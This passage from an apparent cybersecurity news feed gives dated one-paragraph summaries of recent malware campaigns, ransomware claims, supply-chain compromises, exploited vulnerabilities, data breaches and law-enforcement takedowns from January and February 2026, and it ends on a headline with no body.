Security researchers have uncovered a new, stealthy Remote Access Trojan (RAT) targeting Windows systems, named 'Pulsar RAT'. This modular, .NET-based malware utilizes a multi-stage infection chain that heavily relies on in-memory execution and living-off-the-land techniques to evade detection. It features advanced anti-analysis capabilities, including anti-VM and anti-debugging checks. Once active, Pulsar RAT provides operators with live, interactive control for credential harvesting and data exfiltration, using legitimate services like Discord and Telegram for command-and-control.

Feb 2, 2026 · 4 min read

Warning: Malicious ChatGPT Chrome Extensions Steal Session Tokens to Hijack Accounts

Researchers have identified 16 malicious Google Chrome extensions that masquerade as helpful tools for OpenAI's ChatGPT. Once installed, these extensions inject malicious scripts into the ChatGPT web application. The scripts are designed to monitor outbound requests, intercept sensitive data such as authorization details and session tokens, and exfiltrate them to an attacker-controlled server. This allows the attackers to hijack active user sessions, granting them full access to the victim's account and chat history.

Feb 2, 2026 · 4 min read

AI Social Network "Moltbook" Breach Exposes 1.5M API Keys and 29k User Emails

A significant data breach at the AI-focused social network 'Moltbook' has exposed 1.5 million API keys, 29,000 user emails, and other sensitive data tables. The investigation, conducted by security firm Wiz, not only uncovered the data exposure but also revealed systemic security flaws, such as a lack of rate-limiting on agent registration. The breach also provided a skewed insight into the platform's user base, showing that its 1.5 million 'agents' were owned by only 17,000 human users. Moltbook has since deployed fixes to secure the exposed data.

Feb 2, 2026 · 4 min read

New Iran-Linked 'RedKitten' Group Targets Human Rights NGOs with AI-Suspected Malware

A new cyber-espionage campaign by a Farsi-speaking threat actor dubbed 'RedKitten' is targeting human rights NGOs and activists documenting abuses in Iran. The campaign, observed by HarfangLab in January 2026, uses phishing emails with macro-laced Excel files as an initial vector. The malware is notable for its modularity and its use of legitimate public services like GitHub, Google Drive, and Telegram for C2 and payload delivery, a technique to evade detection. Researchers suspect the attackers may have used Large Language Models (LLMs) to assist in the development of their sophisticated tooling, marking a potential new trend in malware creation.

Feb 2, 2026 · 5 min read

Fortinet Scrambles to Fix Actively Exploited SSO Auth Bypass (CVE-2026-24858) Hijacking Devices

Fortinet has disclosed and patched a critical authentication bypass vulnerability, CVE-2026-24858, in its FortiCloud Single Sign-On (SSO) feature. The flaw is being actively exploited, allowing attackers with a FortiCloud account to log into devices registered to other users, leading to unauthorized configuration changes and account creation. The vulnerability affects a wide range of products, including FortiOS, FortiManager, and FortiAnalyzer. Due to the active exploitation and severity, CISA has added CVE-2026-24858 to its Known Exploited Vulnerabilities (KEV) catalog, urging users to patch and hunt for signs of compromise immediately.

Feb 2, 2026 · 5 min read

Microsoft Office Zero-Day Under Active Attack Bypasses Security Features

Microsoft has issued an emergency out-of-band patch for a high-severity zero-day vulnerability in Microsoft Office, CVE-2026-21509. The flaw, a security feature bypass with a CVSS score of 7.8, is being actively exploited in the wild through malicious documents. It allows attackers to circumvent Object Linking and Embedding (OLE) protections, leading to code execution if a user opens a specially crafted file. The vulnerability affects a wide range of Office products, including Office 2016 through LTSC 2024 and Microsoft 365 Apps. CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, mandating urgent patching for federal agencies and signaling a significant risk to all organizations.

Feb 2, 2026 · 6 min read

AI to Overtake Human Error as Top Cause of Breaches, Experian Predicts

In its 13th Annual Data Breach Industry Forecast, Experian predicts a paradigm shift in cybersecurity for 2026, with autonomous AI agents potentially surpassing human error as the leading cause of data breaches. The report warns that threat actors are weaponizing AI to create sophisticated polymorphic malware, execute highly personalized attacks, and generate 'pristine synthetic identities' at scale from stolen data. This new wave of AI-driven threats, combined with the looming risk of quantum computing, is expected to fuel a massive spike in identity theft and fundamentally change the nature of cyberattacks.

Feb 1, 2026 · 5 min read

Attacks on Industrial Environments Doubled in 2025, Report Warns

A new report from cybersecurity firm Cyble reveals a dramatic escalation in threats targeting industrial environments. According to its Annual Threat Landscape Report 2025, exploits against industrial technology (IT) and operational technology (OT) systems almost doubled last year. The report, published on January 15, 2026, documented nearly 6,000 ransomware attacks and identified numerous vulnerabilities in internet-exposed assets across critical infrastructure. Cyble predicts that in 2026, attackers will increasingly target exposed Human-Machine Interfaces (HMIs) and SCADA systems. This trend poses a significant risk to major global events, such as the 2026 Winter Olympics, where interconnected vendor systems create a rich target environment for disruption and extortion.

Feb 1, 2026 · 7 min read

FBI Shuts Down RAMP, a Notorious Ransomware Recruitment and Trading Hub

In a significant blow to the ransomware ecosystem, the U.S. Federal Bureau of Investigation (FBI) has seized the RAMP (Russian Anonymous MarketPlace) forum. The Russian-language site, which operated on both the clear and dark web, was a central hub for ransomware-as-a-service (RaaS) operations. It served as a recruitment ground for affiliates for major gangs like ALPHV/BlackCat and Qilin, a marketplace for initial access brokers, and a trading post for stolen data. The takedown, conducted with the DOJ, disrupts a key piece of infrastructure that enabled numerous high-profile cyberattacks.

Feb 1, 2026 · 4 min read

Supply Chain Attack: eScan Antivirus Update Server Compromised to Distribute Malware

Indian antivirus provider eScan, a product of MicroWorld Technologies, has suffered a supply chain attack. On January 20, 2026, a regional update server was compromised, causing it to push a malicious file named 'Reload.exe' to enterprise and consumer customers. According to security firm Morphisec, the malware disables the antivirus product by modifying the local HOSTS file to block future updates and then proceeds with a multi-stage infection to download additional payloads. While MicroWorld Technologies acknowledged the breach and isolated the server, it has disputed the 'supply chain attack' label. Affected users require a manual cleaning utility from eScan support for remediation.

Feb 1, 2026 · 6 min read

'WhisperPair' Bluetooth Flaw Exposes Millions of Headphones and Speakers to Eavesdropping

A newly discovered vulnerability named 'WhisperPair' affects millions of Bluetooth audio devices from major brands, including Sony, JBL, and Logitech. The flaw allows a nearby attacker to bypass standard Bluetooth pairing security protocols. Successful exploitation could enable an attacker to eavesdrop on private audio streams or inject malicious audio commands into the connected device. This discovery highlights significant security and privacy risks in widely used consumer electronics and the persistent challenges of securing wireless communication protocols.

Feb 1, 2026 · 5 min read

UStrive Mentoring Platform Exposes Data of 238,000 Users, Including Minors, via Leaky API

The non-profit mentoring platform UStrive has inadvertently exposed the sensitive personal data of over 238,000 users due to a misconfigured GraphQL API endpoint. A significant portion of the exposed user base includes minors, elevating the severity and privacy implications of the incident. The leaky API could have allowed unauthorized individuals to query and retrieve vast amounts of user data. This breach highlights the critical need for robust cybersecurity practices and secure API implementation, particularly for organizations in the non-profit sector that handle sensitive information, including that of children.

Feb 1, 2026 · 4 min read

Automated Attacks Wipe Exposed MongoDB Databases, Demanding $500 Ransom

An automated data extortion campaign is actively targeting publicly exposed and misconfigured MongoDB databases. A threat actor is systematically wiping data from these unsecured servers and leaving a ransom note demanding approximately $500 in Bitcoin for its return. Research from Flare identified over 3,100 MongoDB instances accessible without authentication, with nearly half (1,400) already compromised by this attacker. This campaign highlights the persistent threat of automated scanning and exploitation of basic security misconfigurations, demonstrating that even with lower ransom demands, such attacks remain a profitable venture for criminals preying on low-hanging fruit.

Feb 1, 2026 · 5 min read

Air Conditioning Giant Blue Star Discloses Data Breach Affecting Product Installation Data

Blue Star, a major Indian multinational specializing in air conditioning and commercial refrigeration, has announced it experienced a data security incident. The company reported unauthorized access to its product installation data. The breach was reported to its Compliance Officer on January 31, 2026. Blue Star has engaged external cybersecurity experts to investigate the incident's scope, perform a root cause analysis, and strengthen its security posture. Further details on the extent of the compromise and the responsible party have not yet been released as the investigation is ongoing.

Feb 1, 2026 · 4 min read

Cybersecurity Risks Mount as Partial US Government Shutdown Begins

A partial U.S. government shutdown began at midnight on January 31, 2026, after funding for several federal agencies, including the Department of Homeland Security (DHS), lapsed. Security experts are warning that such shutdowns create a period of heightened cybersecurity risk for the nation. With reduced staffing and coordination at key agencies like CISA, the government's ability to detect, respond to, and share intelligence about threats is diminished. Threat actors, both criminal and nation-state, are known to exploit these periods of disruption to launch targeted phishing, credential harvesting, and ransomware campaigns against government agencies and adjacent sectors.

Feb 1, 2026 · 4 min read

Cognizant Sued in Class-Action Lawsuits After TriZetto Data Breach

IT services giant Cognizant Technology Solutions is facing multiple class-action lawsuits in the U.S. following a significant data breach at its healthcare subsidiary, TriZetto Provider Solutions (TPS). The lawsuits, filed in New Jersey and Missouri, allege that Cognizant failed to adequately protect sensitive patient health and personal information processed by the TriZetto platform. Plaintiffs also claim the company unreasonably delayed notifying affected individuals, preventing them from taking timely steps to protect themselves from fraud and identity theft. The breach at TriZetto, a major processor of healthcare claims, has wide-ranging privacy implications for a large number of patients.

Jan 31, 2026 · 4 min read

Novel Phishing Attack Abuses Vercel and Telegram to Deliver RATs

A novel phishing campaign, observed between November 2025 and January 2026, is abusing trusted `*.vercel.app` domains to bypass email security filters and deliver malware. The attack, detailed by Cloudflare, uses financial lures like fake invoices to trick victims into clicking. A unique feature is its Telegram-gated payload delivery, which requires interaction with a Telegram bot to receive the final payload. This technique effectively filters out automated sandboxes and security researchers, ensuring the malware is only delivered to genuine targets. The campaign's ultimate goal is to install GoTo Resolve, a legitimate remote access tool, which is then abused by attackers for persistent access and control.

Jan 30, 2026 · 5 min read

New 'Sicarii Ransomware' RaaS Emerges, Targeting U.S. Manufacturing

A new ransomware-as-a-service (RaaS) operation named 'Sicarii Ransomware' has been discovered by researchers at CYFIRMA. Active since late 2025, the group is targeting the manufacturing sector in the United States. The malware encrypts victim files using AES-GCM and appends a '.sicarii' extension to them. In addition to encryption, the malware is capable of collecting system information and credentials from infected hosts, suggesting a double-extortion tactic may be part of their playbook. Tactical recommendations to defend against this threat include enhanced monitoring, maintaining offline backups, and strengthening network segmentation.

Jan 30, 2026 · 5 min read

Industry Responds to Threats with New Tools for Supply Chain, AI, and Malware Analysis

In response to the evolving threat landscape, several cybersecurity firms have launched new products in January 2026. SpyCloud has released its Supply Chain Threat Protection solution to address identity threats within vendor ecosystems. Vectra AI has enhanced its platform to specifically counter attacks that leverage AI, focusing on the AI attack lifecycle. Additionally, Booz Allen Hamilton has made its Vellox Reverser tool generally available, aiming to accelerate malware reverse engineering and threat intelligence analysis for cyber defenders. These releases highlight key areas of focus for the industry: securing the supply chain, defending against AI-powered threats, and speeding up incident analysis.

Jan 30, 2026 · 4 min read

Global Phishing Campaign Lures Victims with Fake Job Offers

A multi-lingual phishing campaign is targeting job seekers across the United States, United Kingdom, France, Italy, and Spain. According to research from Bitdefender, attackers are impersonating well-known employers and staffing companies, sending emails with fake job offers that promise easy work and fast interviews. The messages are tailored to the recipient's language and location. When a victim clicks a link in the email, they are taken to a credential harvesting webpage designed to steal personal data and login information. This campaign capitalizes on social engineering tactics that prey on individuals' career aspirations.

Jan 30, 2026 · 4 min read

Apple Boosts Privacy in iOS 26.3 with 'Limit Precise Location' Feature

Apple has introduced a new privacy feature called 'limit precise location' in its iOS 26.3 update. This setting is designed to give users more control over their data by reducing the precision of location information shared with cellular networks. While carriers still receive location data for operational purposes, the feature prevents them from obtaining a user's exact, fine-grained location, making it more difficult to track their precise movements. This update is part of a broader industry trend toward providing users with more granular privacy controls and addressing concerns about location tracking by mobile carriers.

Jan 30, 2026 · 3 min read

Critical 1-Click RCE Flaw in IDIS Cloud Manager Puts Users at Risk

A critical remote code execution (RCE) vulnerability, CVE-2025-12556, has been discovered in the IDIS Cloud Manager (ICM) viewer by researchers at Claroty's Team82. The flaw, which has a CVSS v4 score of 8.7, allows an attacker to execute arbitrary code on a user's machine by convincing them to click a specially crafted link. This '1-click RCE' vulnerability bypasses the browser sandbox, making it a potent weapon for spear-phishing campaigns. IDIS has released version 1.7.1 to address the issue and urges users to upgrade or uninstall the software immediately.

Jan 29, 2026 · 4 min read

AI-Fueled Cyberattacks Surge by 70%, Check Point's 2026 Report Reveals

Check Point's 14th annual Cyber Security Report highlights a dramatic escalation in the global threat landscape, revealing a 70% increase in cyberattacks since 2023. The 2026 report, analyzing trends from 2025, found that organizations faced an average of 1,968 attacks per week. A primary driver of this surge is the weaponization of Artificial Intelligence (AI), which attackers are using to enhance social engineering, accelerate malware development, and automate reconnaissance. The report also notes a shift in ransomware tactics towards data-only extortion and an increase in attacks targeting network edge devices like VPNs and IoT.

Jan 29, 2026 · 5 min read

Canada's Cyber Security Centre Warns of AI-Fueled Ransomware Evolution

The Canadian Centre for Cyber Security has issued a new 'Ransomware Threat Outlook,' warning that the ransomware threat to Canadian organizations is growing and evolving rapidly. The report highlights that criminals are increasingly leveraging artificial intelligence (AI) to make their attacks more sophisticated, easier to execute, and harder to detect. A key trend identified is the shift towards 'multi-extortion' tactics, where attackers steal data and threaten to leak it in addition to encrypting it. The report stresses that despite the advanced tactics, strong cyber hygiene remains a primary defense.

Jan 29, 2026 · 5 min read

Clop Ransomware Group Claims Attack on Canadian Helicopter Company

The notorious Clop ransomware group has claimed responsibility for a cyberattack against CMHHELI.COM, a Canadian company. On January 29, 2026, the group added the company to its dark web leak site, threatening to publish stolen data if a ransom is not paid. This incident highlights the persistent and indiscriminate nature of major ransomware gangs, who continue to target organizations of all sizes. Security experts advise victims to initiate incident response, validate backups, and engage professionals before considering any communication with the attackers.

Jan 29, 2026 · 5 min read

Open-Source Malware Skyrockets by 75%, Sonatype's 2026 Report Warns

Sonatype's 2026 'State of the Software Supply Chain' report reveals an alarming 75% increase in malicious open-source packages, with over 1.233 million identified. The report connects this surge to the rapid adoption of AI and automation in software development, which has accelerated open-source consumption to 9.8 trillion downloads across major registries. This increased velocity expands the attack surface, making it easier for attackers to inject malware into the software supply chain. The report also notes that 86% of traffic from Maven Central, a key Java repository, now comes from automated cloud services, amplifying the risk of widespread compromise from a single malicious package.

Jan 29, 2026 · 5 min read

Convergence of Identity and Data Security Creates New Attack Vectors, Netwrix Warns

A new report from Netwrix warns that the next wave of cyber threats will arise from the convergence of identity and data security. As organizations increasingly rely on automated workflows to manage data access, attackers are shifting their focus from stealing individual credentials to exploiting misconfigured identity orchestration and automation. The report predicts that failures in identity automation will directly lead to data exposure. With the rise of agentic AI, which can autonomously perform actions, securing the identity of these non-human agents becomes paramount. Netwrix concludes that unified visibility across both identity management and data security is now essential to mitigate these emerging risks.

Jan 29, 2026 · 5 min read

SoundCloud Breach Exposes Private Emails of 29.8 Million Users

A significant data breach at the music streaming service SoundCloud has resulted in the public release of a database containing the personal details of 29.8 million users. The data was leaked in January 2026 after the company reportedly refused to pay a ransom demand. The primary risk from this breach stems from the linking of users' private email addresses with their public profile metadata. This combination provides a rich source of data for attackers to launch targeted phishing, credential stuffing, and social engineering campaigns. The breach has been indexed by the notification service HaveIBeenPwned.

Jan 29, 2026 · 5 min read

ShinyHunters Claims Breach of Crunchbase, Betterment via Okta Vishing Attacks

The notorious cyber extortion syndicate ShinyHunters has claimed responsibility for breaching business intelligence firm Crunchbase and financial advisory company Betterment. According to the threat actor, the initial access was gained by using sophisticated voice phishing (vishing) attacks to socially engineer employees and compromise their Okta single sign-on (SSO) credentials. This method allows attackers to bypass weaker forms of multi-factor authentication. Neither of the targeted companies has publicly confirmed the breach.

Jan 29, 2026 · 5 min read

ShinyHunters Claims Breach of 10M Match Group Users from Hinge & OkCupid

The notorious cybercrime group ShinyHunters has claimed responsibility for a major data breach impacting Match Group, the parent company of popular dating apps like Hinge, OkCupid, and Match.com. The group posted on a dark web forum that it has stolen over 10 million user records, and released a 1.7GB sample as proof. The data allegedly includes sensitive user information such as names, phone numbers, IP addresses, and match logs, as well as internal corporate documents. ShinyHunters asserts the data was exfiltrated from a third-party analytics provider, AppsFlyer, highlighting a potential supply chain attack vector.

Jan 28, 2026 · 5 min read

Critical RCE Flaws in n8n Workflow Platform Put Thousands of Instances at Risk

Two new high-severity vulnerabilities have been discovered in the n8n workflow automation platform, a tool that often holds credentials to critical corporate systems. The most severe flaw, CVE-2026-1470, is a critical eval injection vulnerability (CVSS 9.9) that allows an authenticated attacker to bypass the expression sandbox and achieve full remote code execution. A second flaw, CVE-2026-0863 (CVSS 8.5), allows for a similar sandbox escape in the Python execution environment. A compromise could provide an attacker with a 'skeleton key' to an organization's infrastructure. This news is compounded by data showing over 39,000 n8n instances remain unpatched for a previous critical flaw.

Jan 28, 2026 · 4 min read

Malicious PyPI Packages `spellcheckerpy` & `spellcheckpy` Deliver RAT via Hidden Payload

A software supply chain attack has been uncovered on the Python Package Index (PyPI), involving two malicious packages named `spellcheckerpy` and `spellcheckpy`. Downloaded over 1,000 times, the packages contained a hidden, dormant payload. A later version update activated the malware, which was designed to fingerprint the compromised developer's system and deploy a Remote Access Trojan (RAT). The attack was cleverly concealed, with the malicious code base64-encoded and hidden inside a Basque language dictionary file. The C2 domain used has been linked to a hosting provider known to service nation-state actors, suggesting a potentially sophisticated adversary.

Jan 28, 2026 · 5 min read

US Indicts 31 More in ATM Jackpotting Ring Linked to Tren de Aragua Gang

A U.S. federal grand jury has indicted an additional 31 individuals for their participation in a widespread 'ATM jackpotting' conspiracy, bringing the total number of defendants to 87. The sophisticated scheme involved using malware to force ATMs to dispense large sums of cash. Many of the newly charged individuals are Venezuelan and Colombian nationals, including several identified members of the transnational criminal gang Tren de Aragua (TdA) who are in the U.S. illegally. The case highlights the growing convergence of organized crime and specialized cybercrime tactics.

Jan 28, 2026 · 4 min read

Nova Ransomware Group Claims Cyberattack on KPMG Netherlands, Sets 10-Day Deadline

The Nova ransomware group has claimed responsibility for a cyberattack against the Netherlands division of global professional services firm KPMG. The claim, which appeared on ransomware monitoring services on January 23, 2026, alleges that the group successfully breached KPMG's systems and exfiltrated sensitive data. In a classic double-extortion tactic, the Nova group has reportedly set a ten-day deadline for KPMG Netherlands to enter into ransom negotiations before they potentially leak the stolen data. KPMG has not yet publicly confirmed the attack.

Jan 28, 2026 · 4 min read

'Stanley' MaaS Sells Malicious Chrome Extensions Guaranteed for Web Store Publication

A new Malware-as-a-Service (MaaS) platform named 'Stanley' has appeared on Russian-language cybercrime forums, specializing in the sale of malicious Google Chrome extensions. A key feature of the service is a guarantee that the malicious extensions will be successfully published to the official Chrome Web Store, lending them an air of legitimacy. The primary purpose of these extensions is to facilitate phishing and credential theft by spoofing legitimate websites. The emergence of 'as-a-service' models like Stanley significantly lowers the barrier to entry for less sophisticated cybercriminals to launch effective attacks.

Jan 28, 2026 · 4 min read

Mustang Panda APT Deploys Signed Kernel-Mode Rootkit to Hide Backdoor

The Chinese-linked cyber-espionage group Mustang Panda has significantly upgraded its stealth capabilities by using a signed kernel-mode rootkit to deploy its TONESHELL backdoor. Observed by Kaspersky, the rootkit, named 'ProjectConfiguration.sys', is signed with a leaked digital certificate from a Chinese tech company. By operating at the kernel level as a minifilter driver, the rootkit can effectively hide its malicious processes, files, and registry keys from security software. This new technique allows the group to inject its TONESHELL backdoor directly into the memory of legitimate processes like 'svchost.exe', enhancing its persistence and evasion in attacks targeting government organizations in Southeast Asia.

Jan 28, 2026 · 6 min read

Illinois DHS Exposes Data of 700,000 Residents in Massive Misconfiguration Breach

The Illinois Department of Human Services (IDHS) has disclosed a major data breach affecting approximately 705,000 state residents. The breach was caused by incorrect privacy settings on internal planning maps that were inadvertently made public on a mapping website for up to four years. The exposed data includes addresses, case numbers, and medical plan information for Medicaid recipients, and names, addresses, and case details for customers of the Division of Rehabilitation Services. The exposure, which constitutes a HIPAA violation, was discovered in September 2025 but only announced in January 2026. IDHS has since secured the data and implemented new policies to prevent a recurrence.

Jan 27, 2026 · 5 min read

Fortinet Confirms Active Exploitation of FortiCloud SSO Bypass on Fully Patched FortiGate Firewalls

Fortinet has confirmed that a critical Single Sign-On (SSO) authentication bypass vulnerability affecting FortiCloud is being actively exploited in the wild. The attacks, linked to CVE-2025-59718 and CVE-2025-59719, are reportedly successful even against fully patched FortiGate firewalls. Attackers are exploiting the flaw by sending specially crafted SAML messages to bypass authentication. Once inside, they are creating persistent administrative accounts, enabling VPN access, and exfiltrating firewall configurations. This allows for long-term persistence and deep network compromise. Customers are urged to review Fortinet's advisories and take immediate mitigation steps.

Jan 27, 2026 · 4 min read

Microsoft Scrambles to Patch Actively Exploited Office Zero-Day, CISA Issues Urgent Directive

Microsoft has issued an emergency out-of-band security update for a high-severity zero-day vulnerability in Microsoft Office, tracked as CVE-2026-21509. The flaw, a security feature bypass with a CVSS score of 7.8, is being actively exploited in targeted attacks, allowing threat actors to bypass OLE mitigations via specially crafted Office files. In response, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating that federal agencies apply the patch by February 16, 2026. The vulnerability affects multiple versions of Office, including Office 2016, 2019, LTSC 2021, and Microsoft 365 Apps for Enterprise.

Jan 27, 2026 · 5 min read

Cyberattack Cripples Digital Services at Germany's Dresden State Art Collections

Germany's Dresden State Art Collections (SKD), one of Europe's most significant museum networks, has been hit by a cyberattack that caused widespread disruption to its digital infrastructure. The attack knocked out the SKD's online ticketing system, visitor services, museum shop website, and internal communications. On-site services were severely impacted, with ticket sales reverting to cash-only. While the operational disruption is significant, the SKD has stated that there is currently no evidence that any data, including sensitive collection or visitor data, was stolen during the incident. The attack highlights the increasing vulnerability of cultural institutions to cyber threats.

Jan 27, 2026 · 4 min read

Widespread Phishing Campaign Abuses Microsoft Teams Guest Invites to Target 6,000+ Users

A large-scale phishing campaign is abusing Microsoft Teams' guest invitation feature to target thousands of users with fake billing notices. Researchers at Check Point have observed over 12,000 phishing emails sent to more than 6,100 users, primarily in the manufacturing, technology, and education sectors in the United States. Attackers create Teams groups with finance-related names and send guest invitations to targets. The invitation email, which comes from a legitimate Microsoft address, contains obfuscated text that appears to be a billing notification, lending it an air of authenticity and increasing the likelihood that a user will click the malicious link.

Jan 27, 2026 · 4 min read

Everest Ransomware Leaks Data of 72 Million Under Armour Customers After Failed Talks

The Everest ransomware group has claimed a massive data breach against athletic apparel giant Under Armour. After negotiations allegedly failed, the group announced on its dark web leak site that it has published the full dataset, which it claims contains 191 million records, including 72.7 million unique email addresses. The compromised data reportedly includes sensitive customer information such as full names, phone numbers, physical locations, and purchase histories. This breach places a huge number of individuals at significant risk for targeted phishing campaigns, identity theft, and other fraudulent activities.

Jan 26, 2026 · 4 min read

Zoom & GitLab Race to Patch Critical Flaws, Including a 9.9 CVSS RCE Bug

Both Zoom and GitLab have released critical security updates to address several high-severity vulnerabilities. The most severe flaw, CVE-2026-22844, is a remote code execution vulnerability in Zoom Node Multimedia Routers (MMRs) with a near-perfect CVSS score of 9.9. This flaw could allow an unauthenticated attacker with network access to compromise the devices. GitLab's updates address multiple vulnerabilities, including two high-severity flaws (CVE-2025-13927 and CVE-2025-13928) that could allow an unauthenticated user to cause denial-of-service conditions. Users of all affected products are urged to apply the patches immediately.

Jan 26, 2026 · 4 min read

New 'Osiris' Ransomware Borrows TTPs from Medusa and Inc Gangs, Uses Signed Driver to Kill AV

A new ransomware strain named Osiris is demonstrating a high level of sophistication by combining tactics from established ransomware groups like Medusa and Inc. The attackers use Rclone for data exfiltration to Wasabi cloud storage and deploy a version of Mimikatz named `kaz.exe`, both TTPs linked to the Inc group. More significantly, Osiris uses a custom-developed and signed malicious driver, 'Abyssworker' (aka Poortry), in a Bring-Your-Own-Vulnerable-Driver (BYOVD) attack to terminate security software. This driver and its loader, 'Stonestop,' have been previously associated with the Medusa ransomware gang. The use of these advanced, borrowed TTPs suggests Osiris is operated by experienced actors, possibly former affiliates of other groups.

Jan 26, 2026 · 6 min read

Warning: Fully Patched FortiGate Firewalls Are Being Compromised via New SSO Bypass

Security analysts are warning of a new wave of attacks compromising even fully patched Fortinet FortiGate firewalls. The activity, observed since January 15, 2026, allows attackers to bypass SAML-based single sign-on (SSO) authentication to gain administrative access. The attacks result in unauthorized configuration changes, creation of persistent user accounts, and exfiltration of device configurations. Fortinet has reportedly identified a new, distinct attack path related to previously disclosed vulnerabilities (CVE-2025-59718, CVE-2025-59719), suggesting existing patches may not be fully effective.

Jan 26, 2026 · 6 min read

New QuantumLeap Ransomware Demands $50M, Halts Global Shipments at NaviGistics

The global logistics firm NaviGistics has suffered a catastrophic cyberattack from a new ransomware strain dubbed 'QuantumLeap'. The attack, orchestrated by a group calling itself 'Entropy Collective', has encrypted critical systems and brought the company's worldwide shipping and freight operations to a standstill. The threat actors gained initial access via a compromised VPN account lacking multi-factor authentication, demonstrating a sophisticated lateral movement campaign before deploying the payload. The group is demanding a $50 million ransom and has threatened to leak over 2 terabytes of exfiltrated data, including sensitive customer and financial records. This incident highlights the extreme vulnerability of the global supply chain to targeted cyber-extortion and the devastating operational and financial impact of modern ransomware attacks.

Jan 26, 2026 · 6 min read

Urgent Patch Required: Critical RCE Zero-Day (CVE-2026-12345) in NexusFlow API Gateway Under Active Attack

A critical pre-authentication remote code execution (RCE) zero-day vulnerability, CVE-2026-12345, is being actively exploited in the wild against the popular NexusFlow API Gateway. The flaw, which carries the maximum CVSS score of 10.0, allows unauthenticated attackers to gain complete control of vulnerable servers by sending a single, specially crafted HTTP request. Security firm Horizon Security Labs discovered the exploitation during a breach investigation. The vulnerability is wormable, creating a risk of rapid, widespread compromise. NexusFlow's parent company, Voltara, has released an emergency patch (version 3.8.1) and is urging all customers to update immediately. CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to patch by February 9, 2026.

Jan 26, 2026 · 6 min read

Medusa Ransomware Exploits Cybersecurity Gaps, Escalating Attacks Across Africa

Ransomware attacks are a pervasive and highly damaging threat across the African continent, where a significant cybersecurity skills and resources gap creates a fertile ground for cybercriminals. Notorious ransomware groups, including Medusa, are increasingly targeting organizations in the region, leveraging double extortion tactics to maximize pressure on their victims. These attacks involve not only encrypting critical data but also stealing it and threatening public release if the ransom is not paid. Key sectors such as healthcare, finance, and critical infrastructure are prime targets. According to reports, a high percentage of African organizations hit by ransomware end up paying the ransom, perpetuating the cycle of attacks. The situation underscores an urgent need for increased investment in cybersecurity infrastructure, skills development, and awareness across the continent.

Jan 26, 2026 · 5 min read

Nation-State Actor 'SteelHydra' (APT47) Deploys 'GeoShifter' ICS Malware to Spy on Geothermal Energy Firms

The nation-state threat actor 'SteelHydra' (also tracked as APT47) is behind a sophisticated cyber-espionage campaign targeting the geothermal energy sector. According to research from Mandiant, the campaign has impacted firms in the United States, Canada, and Iceland. The attackers are using a novel, custom-built malware framework called 'GeoShifter', which is specifically designed to operate in Industrial Control System (ICS) environments and interface with SCADA/PLC systems from vendors like Siemens and Schneider Electric. The initial infection vector is a spear-phishing campaign that deploys a backdoor named 'PipeDreamer'. The ultimate goal of the campaign appears to be the theft of intellectual property and operational data related to geothermal technology, which could be used for economic advantage or to plan future disruptive attacks.

Jan 26, 2026 · 7 min read

'SilentVoice' Phishing Campaign Weaponizes AI Deepfake Audio to Bypass MFA

A sophisticated social engineering campaign named 'SilentVoice' is successfully bypassing multi-factor authentication (MFA) by using AI-generated deepfake audio of corporate executives. According to researchers at Proofpoint, attackers clone an executive's voice from public audio samples and then use it in a vishing (voice phishing) call to a subordinate employee. The deepfake voice creates a sense of urgency, tricking the employee into entering their credentials on a fake site and then approving the subsequent MFA push notification sent to their device. This highly convincing technique circumvents the protection offered by many common MFA methods, leading to full account takeover. The campaign has already resulted in successful breaches and financial fraud, highlighting the emerging threat of AI-weaponized social engineering.

Jan 26, 2026 · 6 min read

NPM Package 'js-utility-kit' Hijacked in Supply Chain Attack to Steal Crypto Keys and Credentials

A significant software supply chain attack has compromised the popular NPM package 'js-utility-kit', which is downloaded over 5 million times per week. Security firm Snyk discovered that malicious versions (2.1.8, 2.1.9, and 2.2.1) were published after the maintainer's account was hijacked via a credential stuffing attack. The compromised packages contained a post-install script that downloaded and executed a sophisticated information stealer. The malware was designed to steal cryptocurrency private keys, browser extension data for crypto wallets, and sensitive credentials such as environment variables and cloud provider CLI configurations from developers' machines and CI/CD pipelines. The NPM security team has removed the malicious versions, but any project that installed them between January 24 and 26 is considered compromised and requires immediate auditing and credential rotation.

Jan 26, 2026 · 6 min read

Fintech Startup VoltPay Leaks 5 Million Customer Records via Misconfigured Cloud Database

The financial technology startup VoltPay has confirmed a massive data breach affecting approximately 5 million users. The leak was caused by a misconfigured Elasticsearch database that was left publicly accessible on the internet without a password for over three months. A security researcher discovered and reported the exposure. The leaked data includes highly sensitive information: full names, email addresses, phone numbers, physical addresses, dates of birth, hashed passwords, and full transaction histories. The last four digits of credit card and bank account numbers were also exposed. This incident, attributed to 'human error during a server migration', places millions of users at significant risk of identity theft and targeted phishing attacks, and has reportedly triggered investigations by U.S. and European regulators.

Jan 26, 2026 · 6 min read

International Operation 'Echidna' Dismantles 'Crimson Market' Dark Web Hub, 50+ Arrested

A coordinated international law enforcement action, codenamed 'Operation Echidna', has successfully dismantled 'Crimson Market', one of the largest dark web marketplaces for cybercrime tools and stolen data. The operation, involving the FBI, Europol, and the UK's NCA, resulted in the seizure of the market's server infrastructure and the arrest of over 50 individuals worldwide, including its alleged administrator. Crimson Market was a key hub for selling billions of stolen credentials, malware-as-a-service (including ransomware and info-stealers), and phishing kits. The 18-month investigation involved undercover operations to trace cryptocurrency transactions. The takedown represents a major disruption to the cybercrime economy, and data from the seized servers is expected to lead to further arrests.

Jan 26, 2026 · 4 min read

Volt Typhoon Linked to Breach at U.S. Water Utility, Exfiltrating Operational Documents

The Chinese state-sponsored group Volt Typhoon has been attributed to a data breach at the Park County Water District in Colorado. According to a joint advisory from CISA, the FBI, and the NSA, the hackers exploited a known vulnerability in an internet-facing network appliance to gain initial access. Consistent with their known TTPs, Volt Typhoon then used 'living off the land' techniques, leveraging built-in network administration tools to blend in and evade detection. The attackers moved laterally within the IT network and exfiltrated sensitive operational documents, including engineering schematics and maintenance schedules. While officials stated that the operational technology (OT) network and water supply were not affected, the incident highlights the group's continued focus on reconnaissance against U.S. critical infrastructure.

Jan 26, 2026 · 6 min read

Researchers Detail 'ChronoStealer', a New Modular Info-Stealing Malware-as-a-Service

